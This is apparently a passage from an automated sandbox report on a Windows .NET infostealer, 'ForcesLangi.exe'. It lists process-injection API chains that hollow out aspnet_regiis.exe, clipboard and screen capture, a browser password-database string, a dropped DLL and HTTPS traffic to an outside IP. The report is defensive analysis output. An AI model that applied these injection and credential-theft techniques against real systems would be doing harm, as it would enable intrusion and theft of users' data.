                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: aspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00753E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00753E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00753E30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00753E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007548C2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_007548C2

                System Summary

                barindex
                .NET source code contains very large array initializations
                Source: ForcesLangi.exe, GetWin.csLarge array initialization: GetWindowsOS: array initializer size 649728
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE04270 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,NtGetContextThread,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,NtCreateThreadEx,0_2_6CE04270
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE02F70 GetModuleHandleW,NtQueryInformationProcess,0_2_6CE02F70
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CDFD1600_2_6CDFD160
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE042700_2_6CE04270
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE02F700_2_6CE02F70
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE130E00_2_6CE130E0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1D0C00_2_6CE1D0C0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE208C00_2_6CE208C0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE29CC00_2_6CE29CC0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1E8D00_2_6CE1E8D0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE174D00_2_6CE174D0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE138D00_2_6CE138D0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CDFC4800_2_6CDFC480
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE120600_2_6CE12060
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE178600_2_6CE17860
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2C0600_2_6CE2C060
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE23C500_2_6CE23C50
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2B0500_2_6CE2B050
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE124200_2_6CE12420
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CDF10100_2_6CDF1010
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE254300_2_6CE25430
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE180000_2_6CE18000
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE24C000_2_6CE24C00
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE0EDF00_2_6CE0EDF0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1D5F00_2_6CE1D5F0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2C9C00_2_6CE2C9C0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE269C00_2_6CE269C0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE12D800_2_6CE12D80
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE265800_2_6CE26580
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE119900_2_6CE11990
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE14D600_2_6CE14D60
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1C9700_2_6CE1C970
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE169700_2_6CE16970
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE165400_2_6CE16540
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE0C9500_2_6CE0C950
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE221300_2_6CE22130
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE109000_2_6CE10900
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE295000_2_6CE29500
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2D9000_2_6CE2D900
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE271000_2_6CE27100
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE20D100_2_6CE20D10
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE28D100_2_6CE28D10
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE0F2E00_2_6CE0F2E0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1FEE00_2_6CE1FEE0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE0DED00_2_6CE0DED0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1A6D00_2_6CE1A6D0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE112600_2_6CE11260
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CDFCE500_2_6CDFCE50
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE156700_2_6CE15670
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE19A200_2_6CE19A20
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2B6200_2_6CE2B620
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE03E300_2_6CE03E30
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE15E300_2_6CE15E30
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE152100_2_6CE15210
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE00FC00_2_6CE00FC0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE193C00_2_6CE193C0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2CFC00_2_6CE2CFC0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1C3D00_2_6CE1C3D0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1DBD00_2_6CE1DBD0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1B7A00_2_6CE1B7A0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE0E7B00_2_6CE0E7B0
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1E3800_2_6CE1E380
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE1A3900_2_6CE1A390
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE127600_2_6CE12760
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CDF73700_2_6CDF7370
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE27F200_2_6CE27F20
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE25B200_2_6CE25B20
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE237200_2_6CE23720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072B1002_2_0072B100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007312272_2_00731227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007592802_2_00759280
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074D34A2_2_0074D34A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007604602_2_00760460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007474402_2_00747440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00760D202_2_00760D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00741D002_2_00741D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075C5A02_2_0075C5A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007286002_2_00728600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00758EA02_2_00758EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072E6872_2_0072E687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007357C02_2_007357C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072C8402_2_0072C840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072D83C2_2_0072D83C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072D0212_2_0072D021
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073D0032_2_0073D003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073B8F62_2_0073B8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074C0E62_2_0074C0E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007360E92_2_007360E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007538D02_2_007538D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007238C02_2_007238C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074A0CA2_2_0074A0CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007588B02_2_007588B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073C8A02_2_0073C8A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074C09E2_2_0074C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007261602_2_00726160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073E9602_2_0073E960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074C09E2_2_0074C09E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007469102_2_00746910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007259002_2_00725900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007609E02_2_007609E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074C9EB2_2_0074C9EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007481CC2_2_007481CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007439B92_2_007439B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007491AE2_2_007491AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074E1802_2_0074E180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075F18B2_2_0075F18B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007242702_2_00724270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075CA402_2_0075CA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075DA4D2_2_0075DA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00755A4F2_2_00755A4F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073E2202_2_0073E220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FA202_2_0075FA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00739AD02_2_00739AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007442D02_2_007442D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00748ABC2_2_00748ABC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00759A802_2_00759A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074F3772_2_0074F377
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072AB402_2_0072AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007413402_2_00741340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FB282_2_0075FB28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FB2A2_2_0075FB2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007293102_2_00729310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FB102_2_0075FB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007273D02_2_007273D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007483D82_2_007483D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072F3C02_2_0072F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00724BA02_2_00724BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073EB802_2_0073EB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073747D2_2_0073747D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075A4402_2_0075A440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00753C102_2_00753C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072D4F32_2_0072D4F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00751CF02_2_00751CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007424E02_2_007424E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007404C62_2_007404C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00734CA02_2_00734CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FD702_2_0075FD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007445602_2_00744560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074CD5E2_2_0074CD5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074CD4C2_2_0074CD4C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00759D302_2_00759D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074C53C2_2_0074C53C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00731D2B2_2_00731D2B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00746D2E2_2_00746D2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007265F02_2_007265F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075CDF02_2_0075CDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075A5D42_2_0075A5D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00757DA92_2_00757DA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074FE742_2_0074FE74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0074EE632_2_0074EE63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00740E6C2_2_00740E6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00742E6D2_2_00742E6D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007586502_2_00758650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073E6302_2_0073E630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073961B2_2_0073961B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075FE002_2_0075FE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0072F60D2_2_0072F60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007606F02_2_007606F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007446D02_2_007446D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00722EB02_2_00722EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073AEB02_2_0073AEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00736F522_2_00736F52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007327502_2_00732750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073DF502_2_0073DF50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007477402_2_00747740
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007497392_2_00749739
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00745F1B2_2_00745F1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_007297802_2_00729780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00727F60 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 00734C90 appears 77 times
                Source: ForcesLangi.exe, 00000000.00000000.1644466778.0000000000774000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIsabellaHarveyViolet.exeyaRT vs ForcesLangi.exe
                Source: ForcesLangi.exe, 00000000.00000002.1650307866.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ForcesLangi.exe
                Source: ForcesLangi.exeBinary or memory string: OriginalFilenameIsabellaHarveyViolet.exeyaRT vs ForcesLangi.exe
                Source: ForcesLangi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@11/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00759280 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00759280
                Source: C:\Users\user\Desktop\ForcesLangi.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
                Source: ForcesLangi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ForcesLangi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\ForcesLangi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1761526878.0000000004F08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ForcesLangi.exeReversingLabs: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\ForcesLangi.exe "C:\Users\user\Desktop\ForcesLangi.exe"
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
